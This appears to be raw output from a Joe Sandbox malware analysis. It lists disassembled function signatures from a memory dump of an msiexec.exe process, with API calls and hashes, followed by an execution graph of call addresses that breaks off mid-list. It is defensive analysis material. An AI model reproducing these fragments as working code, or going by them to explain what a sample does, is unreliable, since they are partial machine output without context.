                                                                      • Instruction Fuzzy Hash: C5F0E927140218BAD6213779EC85E7F777CEFC6A20F04401AF6088B180AB545C5382B5
                                                                      APIs
                                                                      • _free.LIBCMT ref: 238D91D0
                                                                        • Part of subcall function 238D571E: HeapFree.KERNEL32(00000000,00000000,?,238D924F,?,00000000,?,00000000,?,238D9276,?,00000007,?,?,238D7E5A,?), ref: 238D5734
                                                                        • Part of subcall function 238D571E: GetLastError.KERNEL32(?,?,238D924F,?,00000000,?,00000000,?,238D9276,?,00000007,?,?,238D7E5A,?,?), ref: 238D5746
                                                                      • _free.LIBCMT ref: 238D91E2
                                                                      • _free.LIBCMT ref: 238D91F4
                                                                      • _free.LIBCMT ref: 238D9206
                                                                      • _free.LIBCMT ref: 238D9218
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: d8c1c54e19d0c7b5f439f947576cbff2b6d59b837763a173246a36d578aefc31
                                                                      • Instruction ID: 50cee33c81c95c22a88df008b57303cc9df2e456257cf1fca75dd1d072192c26
                                                                      • Opcode Fuzzy Hash: d8c1c54e19d0c7b5f439f947576cbff2b6d59b837763a173246a36d578aefc31
                                                                      • Instruction Fuzzy Hash: 06F01273514648D78660FBF8D9C5C167BE9EB20720F641896F91ADF544CB78FC808E54
                                                                      APIs
                                                                      • _free.LIBCMT ref: 238D536F
                                                                        • Part of subcall function 238D571E: HeapFree.KERNEL32(00000000,00000000,?,238D924F,?,00000000,?,00000000,?,238D9276,?,00000007,?,?,238D7E5A,?), ref: 238D5734
                                                                        • Part of subcall function 238D571E: GetLastError.KERNEL32(?,?,238D924F,?,00000000,?,00000000,?,238D9276,?,00000007,?,?,238D7E5A,?,?), ref: 238D5746
                                                                      • _free.LIBCMT ref: 238D5381
                                                                      • _free.LIBCMT ref: 238D5394
                                                                      • _free.LIBCMT ref: 238D53A5
                                                                      • _free.LIBCMT ref: 238D53B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 312e23362adab75c19c11538f70d66f7ba37bb085b9f81d0ef88b3dd7affc81a
                                                                      • Instruction ID: 5dad497f3b951f3a42290c5bb23a0412fb5cd53296f09c80b5c624fad71297fa
                                                                      • Opcode Fuzzy Hash: 312e23362adab75c19c11538f70d66f7ba37bb085b9f81d0ef88b3dd7affc81a
                                                                      • Instruction Fuzzy Hash: 58F03A76924F28DBCA167F7999808083BF5B739A2471511CBF8269F350DBB98D02CB80
                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 238D4C1D
                                                                      • _free.LIBCMT ref: 238D4CE8
                                                                      • _free.LIBCMT ref: 238D4CF2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Windows\System32\msiexec.exe
                                                                      • API String ID: 2506810119-1382325751
                                                                      • Opcode ID: effc0f7e2fdb4ef7cb6de110ffa88d763b3d21980326f09492bfabf356476038
                                                                      • Instruction ID: 33d96c10b609113db196b7dc323f1d79a845760612ddb34d00c872930642176a
                                                                      • Opcode Fuzzy Hash: effc0f7e2fdb4ef7cb6de110ffa88d763b3d21980326f09492bfabf356476038
                                                                      • Instruction Fuzzy Hash: 2A311C72B0071CEBDB25ABF98984D9EBBFCEB95310F1440E6E9059F201DBB58A41CB50
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,238D6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 238D8731
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 238D87BA
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 238D87CC
                                                                      • __freea.LIBCMT ref: 238D87D5
                                                                        • Part of subcall function 238D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 238D5702
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: 89e3393737ea18a6057715e5c5bcbd5a61319bbb7304156b26854d6148860d76
                                                                      • Instruction ID: 0e7546575a2357314cd401515588dfc81254a8e6fffc7b0e8b18a2042b9f3959
                                                                      • Opcode Fuzzy Hash: 89e3393737ea18a6057715e5c5bcbd5a61319bbb7304156b26854d6148860d76
                                                                      • Instruction Fuzzy Hash: A6319D32A0021EEBDF259FB4CC80DAF7BA5EB50710F0501A9ED04DA150EB35D955CB90
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(238DC7DD), ref: 238DC7E6
                                                                      • GetModuleHandleA.KERNEL32(?,238DC7DD), ref: 238DC838
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 238DC860
                                                                        • Part of subcall function 238DC803: GetProcAddress.KERNEL32(00000000,238DC7F4), ref: 238DC804
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID:
                                                                      • API String ID: 1646373207-0
                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                      • Instruction ID: f8c1f5006597a3a0b6d8e1f5a706758101c75b97bcffbb5e2d63e1880fe7c364
                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                      • Instruction Fuzzy Hash: D401D61398534DF8AA2166F84C01DAA9FF89B27661F1817D6E350CE193DAA08506C3A9
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,238D1D66,00000000,00000000,?,238D5C88,238D1D66,00000000,00000000,00000000,?,238D5E85,00000006,FlsSetValue), ref: 238D5D13
                                                                      • GetLastError.KERNEL32(?,238D5C88,238D1D66,00000000,00000000,00000000,?,238D5E85,00000006,FlsSetValue,238DE190,FlsSetValue,00000000,00000364,?,238D5BC8), ref: 238D5D1F
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,238D5C88,238D1D66,00000000,00000000,00000000,?,238D5E85,00000006,FlsSetValue,238DE190,FlsSetValue,00000000), ref: 238D5D2D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: b53cb334715bd2fc58453e0ed413d434792ef6220ead08f7023346a3aebd8e3a
                                                                      • Instruction ID: f7c28895c9b8db37f2fcba5f4ea4a303c1e809fa797a4746df5591e0f896b678
                                                                      • Opcode Fuzzy Hash: b53cb334715bd2fc58453e0ed413d434792ef6220ead08f7023346a3aebd8e3a
                                                                      • Instruction Fuzzy Hash: D601473320262EEBC3116EB9DC4CE4637DCAF426A1B140672FA0ADF144E724C815CAF0
                                                                      APIs
                                                                      • _free.LIBCMT ref: 238D655C
                                                                        • Part of subcall function 238D62BC: IsProcessorFeaturePresent.KERNEL32(00000017,238D62AB,00000000,?,?,?,?,00000016,?,?,238D62B8,00000000,00000000,00000000,00000000,00000000), ref: 238D62BE
                                                                        • Part of subcall function 238D62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 238D62E0
                                                                        • Part of subcall function 238D62BC: TerminateProcess.KERNEL32(00000000), ref: 238D62E7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                      • String ID: *?$.
                                                                      • API String ID: 2667617558-3972193922
                                                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                      • Instruction ID: 77aca8e9aedb74bd80b2bc6e153d6283e5f649ecf6fbbd28836aa7aa88aa2aa8
                                                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                      • Instruction Fuzzy Hash: 88518276E0020DEFDB14DFF8C880AADBBB9EF58314F6481A9D454EB345E6359A41CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID: : $Se.
                                                                      • API String ID: 4218353326-4089948878
                                                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                      • Instruction ID: ed03dacc839f14a3045924847a18087dcaa7e8ba69c6b2f0830b782c3177dcf1
                                                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                      • Instruction Fuzzy Hash: 5E11B272A00348AECB14DFFC9840BEDFBBCAF19204F145096E545EB222E6705A02C765
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 238D2903
                                                                        • Part of subcall function 238D35D2: RaiseException.KERNEL32(?,?,?,238D2925,00000000,00000000,00000000,?,?,?,?,?,238D2925,?,238E21B8), ref: 238D3632
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 238D2920
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3476068407-410509341
                                                                      • Opcode ID: d57abf94749e23b850f48f66cdc1ac7d5928b3b769a574a72e6b0ad1565ccb9c
                                                                      • Instruction ID: 3dab8c50ecf4b411ccdd8fff38c9c59df63c61e2c71d16ecb1594fa8bef24d77
                                                                      • Opcode Fuzzy Hash: d57abf94749e23b850f48f66cdc1ac7d5928b3b769a574a72e6b0ad1565ccb9c
                                                                      • Instruction Fuzzy Hash: 4EF08C36A1430DF7CB14B6F8E884D9DB76C9F21650F5041E1BA289E091EF61EA2AC592

                                                                      Execution Graph

                                                                      Execution Coverage:5.7%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:1.3%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:73
                                                                      execution_graph 40289 441819 40292 430737 40289->40292 40291 441825 40293 430756 40292->40293 40294 43076d 40292->40294 40295 430774 40293->40295 40296 43075f 40293->40296 40294->40291 40307 43034a memcpy 40295->40307 40306 4169a7 11 API calls 40296->40306 40299 4307ce 40300 430819 memset 40299->40300 40308 415b2c 11 API calls 40299->40308 40300->40294 40301 43077e 40301->40294 40301->40299 40304 4307fa 40301->40304 40303 4307e9 40303->40294 40303->40300 40309 4169a7 11 API calls 40304->40309 40306->40294 40307->40301 40308->40303 40309->40294 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37965 40dd07 memset 37891->37965 37892 412827 37970 40db69 memset 37892->37970 37896 412822 37992 4125b6 ??3@YAXPAX DeleteObject 37896->37992 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37975 41268e 37898->37975 37900 412966 37993 40b1ab free free 37900->37993 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37991 37905 41296f 37994 40b633 37905->37994 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37998 40a804 memset 37930->37998 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38020 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38020 38009 444722 37941->38009 37946 41259b wcscpy 37946->37886 38025 40b1ab free free 37947->38025 37949 40ad76 38026 40aa04 37949->38026 37952 40a9ce malloc memcpy free free 37955 40ac5c 37952->37955 37953 40ad4b 37953->37949 38049 40a9ce 37953->38049 37955->37949 37955->37952 37955->37953 37956 40ace7 free 37955->37956 38029 40a8d0 37955->38029 38041 4099f4 37955->38041 37956->37955 37960 40a8d0 7 API calls 37960->37949 37961 40ada2 37962 40adc9 37961->37962 37964 40adaa 37961->37964 37962->37891 37962->37892 37963 40adb3 _wcsicmp 37963->37962 37963->37964 37964->37962 37964->37963 38054 40dce0 37965->38054 37967 40dd3a GetModuleHandleW 38059 40dba7 37967->38059 37971 40dce0 3 API calls 37970->37971 37972 40db99 37971->37972 38131 40dae1 37972->38131 38145 402f3a 37975->38145 37977 412766 37977->37896 37977->37901 37978 4126d3 _wcsicmp 37979 4126a8 37978->37979 37979->37977 37979->37978 37981 41270a 37979->37981 38179 4125f8 7 API calls 37979->38179 37981->37977 38148 411ac5 37981->38148 37991->37907 37992->37900 37993->37905 37995 40b640 37994->37995 37996 40b639 free 37994->37996 37997 40b1ab free free 37995->37997 37996->37995 37997->37913 37999 40a83b GetSystemDirectoryW 37998->37999 38000 40a84c wcscpy 37998->38000 37999->38000 38005 409719 wcslen 38000->38005 38003 40a881 LoadLibraryW 38004 40a886 38003->38004 38004->37931 38004->37934 38006 409724 38005->38006 38007 409739 wcscat LoadLibraryW 38005->38007 38006->38007 38008 40972c wcscat 38006->38008 38007->38003 38007->38004 38008->38007 38010 444732 38009->38010 38011 444728 DeleteObject 38009->38011 38021 409cc3 38010->38021 38011->38010 38013 412551 38014 4010f9 38013->38014 38015 401130 38014->38015 38016 401134 GetModuleHandleW LoadIconW 38015->38016 38017 401107 wcsncat 38015->38017 38018 40a7be 38016->38018 38017->38015 38019 40a7d2 38018->38019 38019->37946 38019->38019 38020->37941 38024 409bfd memset wcscpy 38021->38024 38023 409cdb CreateFontIndirectW 38023->38013 38024->38023 38025->37955 38027 40aa14 38026->38027 38028 40aa0a free 38026->38028 38027->37961 38028->38027 38030 40a8eb 38029->38030 38031 40a8df wcslen 38029->38031 38032 40a906 free 38030->38032 38033 40a90f 38030->38033 38031->38030 38034 40a919 38032->38034 38035 4099f4 3 API calls 38033->38035 38036 40a932 38034->38036 38037 40a929 free 38034->38037 38035->38034 38038 4099f4 3 API calls 38036->38038 38039 40a93e memcpy 38037->38039 38040 40a93d 38038->38040 38039->37955 38040->38039 38042 409a41 38041->38042 38043 4099fb malloc 38041->38043 38042->37955 38045 409a37 38043->38045 38046 409a1c 38043->38046 38045->37955 38047 409a30 free 38046->38047 38048 409a20 memcpy 38046->38048 38047->38045 38048->38047 38050 40a9e7 38049->38050 38051 40a9dc free 38049->38051 38053 4099f4 3 API calls 38050->38053 38052 40a9f2 38051->38052 38052->37960 38053->38052 38078 409bca GetModuleFileNameW 38054->38078 38056 40dce6 wcsrchr 38057 40dcf5 38056->38057 38058 40dcf9 wcscat 38056->38058 38057->38058 38058->37967 38079 44db70 38059->38079 38063 40dbfd 38082 4447d9 38063->38082 38066 40dc34 wcscpy wcscpy 38108 40d6f5 38066->38108 38067 40dc1f wcscpy 38067->38066 38070 40d6f5 3 API calls 38071 40dc73 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc89 38072->38073 38074 40d6f5 3 API calls 38073->38074 38075 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38074->38075 38114 40da80 38075->38114 38078->38056 38080 40dbb4 memset memset 38079->38080 38081 409bca GetModuleFileNameW 38080->38081 38081->38063 38084 4447f4 38082->38084 38083 40dc1b 38083->38066 38083->38067 38084->38083 38085 444807 ??2@YAPAXI 38084->38085 38086 44481f 38085->38086 38087 444873 _snwprintf 38086->38087 38088 4448ab wcscpy 38086->38088 38121 44474a 8 API calls 38087->38121 38090 4448bb 38088->38090 38122 44474a 8 API calls 38090->38122 38091 4448a7 38091->38088 38091->38090 38093 4448cd 38123 44474a 8 API calls 38093->38123 38095 4448e2 38124 44474a 8 API calls 38095->38124 38097 4448f7 38125 44474a 8 API calls 38097->38125 38099 44490c 38126 44474a 8 API calls 38099->38126 38101 444921 38127 44474a 8 API calls 38101->38127 38103 444936 38128 44474a 8 API calls 38103->38128 38105 44494b 38129 44474a 8 API calls 38105->38129 38107 444960 ??3@YAXPAX 38107->38083 38109 44db70 38108->38109 38110 40d702 memset GetPrivateProfileStringW 38109->38110 38111 40d752 38110->38111 38112 40d75c WritePrivateProfileStringW 38110->38112 38111->38112 38113 40d758 38111->38113 38112->38113 38113->38070 38115 44db70 38114->38115 38116 40da8d memset 38115->38116 38117 40daac LoadStringW 38116->38117 38118 40dac6 38117->38118 38118->38117 38120 40dade 38118->38120 38130 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38118->38130 38120->37896 38121->38091 38122->38093 38123->38095 38124->38097 38125->38099 38126->38101 38127->38103 38128->38105 38129->38107 38130->38118 38141 409b98 GetFileAttributesW 38131->38141 38133 40daea 38134 40db63 38133->38134 38135 40daef wcscpy wcscpy GetPrivateProfileIntW 38133->38135 38134->37897 38142 40d65d GetPrivateProfileStringW 38135->38142 38137 40db3e 38143 40d65d GetPrivateProfileStringW 38137->38143 38139 40db4f 38144 40d65d GetPrivateProfileStringW 38139->38144 38141->38133 38142->38137 38143->38139 38144->38134 38180 40eaff 38145->38180 38149 411ae2 memset 38148->38149 38150 411b8f 38148->38150 38221 409bca GetModuleFileNameW 38149->38221 38162 411a8b 38150->38162 38152 411b0a wcsrchr 38153 411b22 wcscat 38152->38153 38154 411b1f 38152->38154 38222 414770 wcscpy wcscpy wcscpy CloseHandle 38153->38222 38154->38153 38156 411b67 38223 402afb 38156->38223 38160 411b7f 38279 40ea13 SendMessageW memset SendMessageW 38160->38279 38163 402afb 27 API calls 38162->38163 38164 411ac0 38163->38164 38165 4110dc 38164->38165 38166 41113e 38165->38166 38171 4110f0 38165->38171 38304 40969c LoadCursorW SetCursor 38166->38304 38168 411143 38305 4032b4 38168->38305 38323 444a54 38168->38323 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38326 410c46 10 API calls 38171->38326 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38179->37979 38181 40eb10 38180->38181 38194 40e8e0 38181->38194 38184 40eb6c memcpy memcpy 38185 40ebe1 38184->38185 38186 40ebb7 38184->38186 38185->38184 38187 40ebf2 ??2@YAPAXI ??2@YAPAXI 38185->38187 38186->38185 38188 40d134 16 API calls 38186->38188 38189 40ec2e ??2@YAPAXI 38187->38189 38192 40ec65 38187->38192 38188->38186 38189->38192 38204 40ea7f 38192->38204 38193 402f49 38193->37979 38195 40e8f2 38194->38195 38196 40e8eb ??3@YAXPAX 38194->38196 38197 40e900 38195->38197 38198 40e8f9 ??3@YAXPAX 38195->38198 38196->38195 38199 40e90a ??3@YAXPAX 38197->38199 38201 40e911 38197->38201 38198->38197 38199->38201 38200 40e931 ??2@YAPAXI ??2@YAPAXI 38200->38184 38201->38200 38202 40e921 ??3@YAXPAX 38201->38202 38203 40e92a ??3@YAXPAX 38201->38203 38202->38203 38203->38200 38205 40aa04 free 38204->38205 38206 40ea88 38205->38206 38207 40aa04 free 38206->38207 38208 40ea90 38207->38208 38209 40aa04 free 38208->38209 38210 40ea98 38209->38210 38211 40aa04 free 38210->38211 38212 40eaa0 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eab3 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eabd 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eac7 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40ead1 38219->38220 38220->38193 38221->38152 38222->38156 38280 40b2cc 38223->38280 38225 402b0a 38226 40b2cc 27 API calls 38225->38226 38227 402b23 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b3a 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b54 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b6b 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b82 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b99 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bb0 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bc7 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bde 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bf5 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c0c 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c23 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c3a 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c51 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c68 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c7f 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c99 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cb3 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cd5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cf0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d0b 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d26 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d3e 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d59 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d78 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d93 38276->38277 38278 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38277->38278 38278->38160 38279->38150 38283 40b58d 38280->38283 38282 40b2d1 38282->38225 38284 40b5a4 GetModuleHandleW FindResourceW 38283->38284 38285 40b62e 38283->38285 38286 40b5c2 LoadResource 38284->38286 38288 40b5e7 38284->38288 38285->38282 38287 40b5d0 SizeofResource LockResource 38286->38287 38286->38288 38287->38288 38288->38285 38296 40afcf 38288->38296 38290 40b608 memcpy 38299 40b4d3 memcpy 38290->38299 38292 40b61e 38300 40b3c1 18 API calls 38292->38300 38294 40b626 38301 40b04b 38294->38301 38297 40b04b ??3@YAXPAX 38296->38297 38298 40afd7 ??2@YAPAXI 38297->38298 38298->38290 38299->38292 38300->38294 38302 40b051 ??3@YAXPAX 38301->38302 38303 40b05f 38301->38303 38302->38303 38303->38285 38304->38168 38306 4032c4 38305->38306 38307 40b633 free 38306->38307 38308 403316 38307->38308 38327 44553b 38308->38327 38312 403480 38525 40368c 15 API calls 38312->38525 38314 403489 38315 40b633 free 38314->38315 38316 403495 38315->38316 38316->38170 38317 4033a9 memset memcpy 38318 4033ec wcscmp 38317->38318 38319 40333c 38317->38319 38318->38319 38319->38312 38319->38317 38319->38318 38523 4028e7 11 API calls 38319->38523 38524 40f508 6 API calls 38319->38524 38322 403421 _wcsicmp 38322->38319 38324 444a64 FreeLibrary 38323->38324 38325 444a83 38323->38325 38324->38325 38325->38170 38326->38171 38328 445548 38327->38328 38329 445599 38328->38329 38526 40c768 38328->38526 38330 4455a8 memset 38329->38330 38338 4457f2 38329->38338 38609 403988 38330->38609 38336 4455e5 38351 445672 38336->38351 38356 44560f 38336->38356 38341 445854 38338->38341 38711 403e2d memset memset memset memset memset 38338->38711 38339 4458bb memset memset 38343 414c2e 14 API calls 38339->38343 38385 4458aa 38341->38385 38734 403c9c memset memset memset memset memset 38341->38734 38342 44595e memset memset 38346 414c2e 14 API calls 38342->38346 38347 4458f9 38343->38347 38345 445a00 memset memset 38757 414c2e 38345->38757 38354 44599c 38346->38354 38355 40b2cc 27 API calls 38347->38355 38348 44558c 38593 444b06 38348->38593 38349 44557a 38349->38348 38804 4136c0 CoTaskMemFree 38349->38804 38620 403fbe memset memset memset memset 